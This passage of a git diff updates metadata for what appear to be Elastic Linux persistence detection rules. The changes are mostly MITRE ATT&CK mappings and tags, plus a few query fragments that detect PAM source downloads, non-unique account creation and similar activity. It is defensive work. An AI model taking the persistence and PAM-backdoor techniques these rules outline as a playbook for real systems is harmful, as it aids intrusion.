= "2026/03/23" [transform] [[transform.osquery]] @@ -122,18 +122,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "high" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Auditd Manager", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Data Source: SentinelOne"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -147,16 +136,24 @@ process.args in ("-o", "--non-unique") framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1136" -name = "Create Account" -reference = "https://attack.mitre.org/techniques/T1136/" - -[[rule.threat.technique.subtechnique]] -id = "T1136.001" -name = "Local Account" -reference = "https://attack.mitre.org/techniques/T1136/001/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_linux_group_creation.toml b/rules/linux/persistence_linux_group_creation.toml index 1a5ec523679..f7dfdc918b0 100644 --- a/rules/linux/persistence_linux_group_creation.toml +++ b/rules/linux/persistence_linux_group_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/13" integration = ["system"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -103,13 +103,7 @@ Filebeat is a lightweight shipper for forwarding and centralizing log data. Inst - To run the system module of Filebeat on Linux follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-system.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -120,16 +114,34 @@ iam where host.os.type == "linux" and event.type == "group" and event.type == "c framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1136" -name = "Create Account" -reference = "https://attack.mitre.org/techniques/T1136/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [[rule.threat.technique.subtechnique]] -id = "T1136.001" -name = "Local Account" -reference = "https://attack.mitre.org/techniques/T1136/001/" +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_linux_shell_activity_via_web_server.toml b/rules/linux/persistence_linux_shell_activity_via_web_server.toml index e3267bc31b1..a496f455970 100644 --- a/rules/linux/persistence_linux_shell_activity_via_web_server.toml +++ b/rules/linux/persistence_linux_shell_activity_via_web_server.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/04" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -179,6 +179,19 @@ process where host.os.type == "linux" and event.type == "start" and process.pare [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1505" name = "Server Software Component" @@ -193,16 +206,3 @@ reference = "https://attack.mitre.org/techniques/T1505/003/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1190" -name = "Exploit Public-Facing Application" -reference = "https://attack.mitre.org/techniques/T1190/" - -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/linux/persistence_linux_user_added_to_privileged_group.toml b/rules/linux/persistence_linux_user_added_to_privileged_group.toml index 10ff2785c87..001f3e1a015 100644 --- a/rules/linux/persistence_linux_user_added_to_privileged_group.toml +++ b/rules/linux/persistence_linux_user_added_to_privileged_group.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/13" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -114,18 +114,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Auditd Manager", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Elastic Defend", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Data Source: SentinelOne"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -144,16 +133,34 @@ process.executable != null and process.args in ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1136" -name = "Create Account" -reference = "https://attack.mitre.org/techniques/T1136/" +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" [[rule.threat.technique.subtechnique]] -id = "T1136.001" -name = "Local Account" -reference = "https://attack.mitre.org/techniques/T1136/001/" +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.007" +name = "Additional Local or Domain Groups" +reference = "https://attack.mitre.org/techniques/T1098/007/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/persistence_lkm_configuration_file_creation.toml b/rules/linux/persistence_lkm_configuration_file_creation.toml index 4bf0c7baf4b..f939a674b6d 100644 --- a/rules/linux/persistence_lkm_configuration_file_creation.toml +++ b/rules/linux/persistence_lkm_configuration_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/17" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -54,15 +54,7 @@ Loadable Kernel Modules (LKMs) are components that can be dynamically loaded int risk_score = 47 rule_id = "6e2355cc-c60a-4d92-a80c-e54a45ad2400" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -121,16 +113,3 @@ reference = "https://attack.mitre.org/techniques/T1547/006/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1014" -name = "Rootkit" -reference = "https://attack.mitre.org/techniques/T1014/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_manual_dracut_execution.toml b/rules/linux/persistence_manual_dracut_execution.toml index 0afee6bda3f..71052803c71 100644 --- a/rules/linux/persistence_manual_dracut_execution.toml +++ b/rules/linux/persistence_manual_dracut_execution.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -82,18 +82,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -125,21 +114,3 @@ reference = "https://attack.mitre.org/techniques/T1542/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/persistence_message_of_the_day_creation.toml b/rules/linux/persistence_message_of_the_day_creation.toml index 32d08cc31f9..5caeea7b41d 100644 --- a/rules/linux/persistence_message_of_the_day_creation.toml +++ b/rules/linux/persistence_message_of_the_day_creation.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/28" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -179,6 +179,11 @@ id = "T1037" name = "Boot or Logon Initialization Scripts" reference = "https://attack.mitre.org/techniques/T1037/" +[[rule.threat.technique.subtechnique]] +id = "T1037.001" +name = "Logon Script (Windows)" +reference = "https://attack.mitre.org/techniques/T1037/001/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/linux/persistence_message_of_the_day_execution.toml b/rules/linux/persistence_message_of_the_day_execution.toml index 4e5c181f2dd..e685a469553 100644 --- a/rules/linux/persistence_message_of_the_day_execution.toml +++ b/rules/linux/persistence_message_of_the_day_execution.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/28" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -205,6 +205,11 @@ id = "T1037" name = "Boot or Logon Initialization Scripts" reference = "https://attack.mitre.org/techniques/T1037/" +[[rule.threat.technique.subtechnique]] +id = "T1037.001" +name = "Logon Script (Windows)" +reference = "https://attack.mitre.org/techniques/T1037/001/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/linux/persistence_network_manager_dispatcher_persistence.toml b/rules/linux/persistence_network_manager_dispatcher_persistence.toml index 089f1d5d144..5e52842ddea 100644 --- a/rules/linux/persistence_network_manager_dispatcher_persistence.toml +++ b/rules/linux/persistence_network_manager_dispatcher_persistence.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/01/26" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -79,18 +79,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -126,42 +115,11 @@ not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_openssl_passwd_hash_generation.toml b/rules/linux/persistence_openssl_passwd_hash_generation.toml index dc7660861c7..f8e54f5938d 100644 --- a/rules/linux/persistence_openssl_passwd_hash_generation.toml +++ b/rules/linux/persistence_openssl_passwd_hash_generation.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -111,6 +111,11 @@ not process.args in ("-help", "--help", "-h") [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + [[rule.threat.technique]] id = "T1136" name = "Create Account" diff --git a/rules/linux/persistence_pluggable_authentication_module_creation.toml b/rules/linux/persistence_pluggable_authentication_module_creation.toml index a5bebae77f2..231a8a31bd3 100644 --- a/rules/linux/persistence_pluggable_authentication_module_creation.toml +++ b/rules/linux/persistence_pluggable_authentication_module_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/03/06" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -119,14 +119,19 @@ file where host.os.type == "linux" and event.action == "creation" and process.ex framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.003" +name = "Pluggable Authentication Modules" +reference = "https://attack.mitre.org/techniques/T1556/003/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -136,7 +141,12 @@ id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.003" +name = "Pluggable Authentication Modules" +reference = "https://attack.mitre.org/techniques/T1556/003/" + [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/persistence_pluggable_authentication_module_creation_in_unusual_dir.toml b/rules/linux/persistence_pluggable_authentication_module_creation_in_unusual_dir.toml index 2505889ddd7..d4ef01be97c 100644 --- a/rules/linux/persistence_pluggable_authentication_module_creation_in_unusual_dir.toml +++ b/rules/linux/persistence_pluggable_authentication_module_creation_in_unusual_dir.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/16" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -101,14 +101,19 @@ file where host.os.type == "linux" and event.type == "creation" and file.name li framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.003" +name = "Pluggable Authentication Modules" +reference = "https://attack.mitre.org/techniques/T1556/003/" [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" [[rule.threat]] framework = "MITRE ATT&CK" @@ -118,7 +123,12 @@ id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.003" +name = "Pluggable Authentication Modules" +reference = "https://attack.mitre.org/techniques/T1556/003/" + [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/persistence_pluggable_authentication_module_pam_exec_backdoor_exec.toml b/rules/linux/persistence_pluggable_authentication_module_pam_exec_backdoor_exec.toml index 57331335bcc..03bf5554379 100644 --- a/rules/linux/persistence_pluggable_authentication_module_pam_exec_backdoor_exec.toml +++ b/rules/linux/persistence_pluggable_authentication_module_pam_exec_backdoor_exec.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/29" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -65,15 +65,7 @@ references = [ risk_score = 47 rule_id = "96f29282-ffcc-4ce7-834b-b17aee905568" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "eql" query = ''' sequence by process.entity_id with maxspan=3s @@ -105,25 +97,17 @@ sequence by process.entity_id with maxspan=3s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" +[[rule.threat.technique.subtechnique]] +id = "T1556.003" +name = "Pluggable Authentication Modules" +reference = "https://attack.mitre.org/techniques/T1556/003/" + [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/persistence_pluggable_authentication_module_source_download.toml b/rules/linux/persistence_pluggable_authentication_module_source_download.toml index 458326e408c..974af680518 100644 --- a/rules/linux/persistence_pluggable_authentication_module_source_download.toml +++ b/rules/linux/persistence_pluggable_authentication_module_source_download.toml @@ -2,7 +2,7 @@ creation_date = "2024/12/16" integration = ["endpoint", "crowdstrike"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -62,17 +62,7 @@ references = [ risk_score = 47 rule_id = "53ef31ea-1f8a-493b-9614-df23d8277232" severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", - "Data Source: Crowdstrike", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Resources: Investigation Guide", "Data Source: Crowdstrike"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -85,24 +75,11 @@ process.args like~ "https://github.com/linux-pam/linux-pam/releases/download/v*/ framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/persistence_polkit_policy_creation.toml b/rules/linux/persistence_polkit_policy_creation.toml index 0735fde6ca8..705ed474e08 100644 --- a/rules/linux/persistence_polkit_policy_creation.toml +++ b/rules/linux/persistence_polkit_policy_creation.toml @@ -2,7 +2,7 @@ creation_date = "2025/01/16" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -54,17 +54,7 @@ Polkit, or PolicyKit, is a system service in Linux environments that manages sys risk_score = 21 rule_id = "0f54e947-9ab3-4dff-9e8d-fb42493eaa2f" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Tactic: Persistence", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Data Source: Elastic Endgame", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -109,25 +99,12 @@ file.extension in ("rules", "pkla", "policy") and file.path like~ ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1543" -name = "Create or Modify System Process" -reference = "https://attack.mitre.org/techniques/T1543/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1556" name = "Modify Authentication Process" reference = "https://attack.mitre.org/techniques/T1556/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/persistence_potential_persistence_script_executable_bit_set.toml b/rules/linux/persistence_potential_persistence_script_executable_bit_set.toml index ada832ab5a8..fc9be420d9d 100644 --- a/rules/linux/persistence_potential_persistence_script_executable_bit_set.toml +++ b/rules/linux/persistence_potential_persistence_script_executable_bit_set.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/03" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -145,6 +145,16 @@ id = "T1053.003" name = "Cron" reference = "https://attack.mitre.org/techniques/T1053/003/" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat.technique.subtechnique]] +id = "T1546.017" +name = "Udev Rules" +reference = "https://attack.mitre.org/techniques/T1546/017/" + [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" diff --git a/rules/linux/persistence_process_capability_set_via_setcap.toml b/rules/linux/persistence_process_capability_set_via_setcap.toml index 412be59834c..a915555bf2b 100644 --- a/rules/linux/persistence_process_capability_set_via_setcap.toml +++ b/rules/linux/persistence_process_capability_set_via_setcap.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/03" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -79,17 +79,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Privilege Escalation", - "Data Source: Elastic Endgame", - "Data Source: Elastic Defend", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -110,13 +100,10 @@ process.name == "setcap" and not ( [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" [rule.threat.tactic] id = "TA0004" diff --git a/rules/linux/persistence_pth_file_creation.toml b/rules/linux/persistence_pth_file_creation.toml index 8492cf01914..78290a1d91f 100644 --- a/rules/linux/persistence_pth_file_creation.toml +++ b/rules/linux/persistence_pth_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/26" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/22" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -85,16 +85,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Persistence", - "Tactic: Execution", - "Tactic: Defense Evasion", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -139,38 +130,7 @@ id = "T1546.018" name = "Python Startup Hooks" reference = "https://attack.mitre.org/techniques/T1546/018/" -[[rule.threat.technique]] -id = "T1574" -name = "Hijack Execution Flow" -reference = "https://attack.mitre.org/techniques/T1574/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/persistence_rpm_package_installation_from_unusual_parent.toml b/rules/linux/persistence_rpm_package_installation_from_unusual_parent.toml index 378adc56fd5..6e0ad16550d 100644 --- a/rules/linux/persistence_rpm_package_installation_from_unusual_parent.toml +++ b/rules/linux/persistence_rpm_package_installation_from_unusual_parent.toml @@ -2,7 +2,7 @@ creation_date = "2024/07/10" integration = ["endpoint"] maturity = "production" -updated_date = 